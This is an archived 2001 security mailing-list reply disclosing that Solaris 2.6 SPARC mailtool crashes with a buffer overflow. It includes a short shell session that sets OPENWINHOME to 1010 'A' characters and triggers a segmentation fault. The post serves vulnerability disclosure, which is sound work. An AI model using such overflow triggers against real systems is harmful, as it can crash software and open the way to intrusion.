RE: [synnergy] - Solaris mailtool(1) buffer overflow vulnerability

From: SChoe (schoeat_private)
Date: Tue May 29 2001 - 16:03:49 PDT

Next message: Magosányi: "Re: insecure signal handler design"

Previous message: Nobuo Miwa: "Re: TrendMicro Interscan VirusWall RegGo.dll BOf"
Maybe in reply to: dethy: "[synnergy] - Solaris mailtool(1) buffer overflow vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

dethyat_private wrote:
> [possibly others]

/usr/openwin/bin/mailtool for solaris 2.6 / SPARC is
also vulnerable to buffer overflow.

<------------------------snip-------------------------->
bash-2.04$ uname -a
SunOS <hostname> 5.6 Generic_105181-23 sun4u sparc
bash-2.04$ export OPENWINHOME=`perl -e 'print "A"x1010'`
bash-2.04$ /usr/local/bin/mailtool
Segmentation Fault
bash-2.04$
<------------------------snap-------------------------->


+--------------------------------------------------+
| Sung J. Choe / UNIX Admin / www.CheapTickets.com |
|                                                  |
|       Ph: 808/945.7439   Fax: 808/946.5993       |
:--------------------------------------------------+

Next message: Magosányi: "Re: insecure signal handler design"
Previous message: Nobuo Miwa: "Re: TrendMicro Interscan VirusWall RegGo.dll BOf"
Maybe in reply to: dethy: "[synnergy] - Solaris mailtool(1) buffer overflow vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed May 30 2001 - 11:03:32 PDT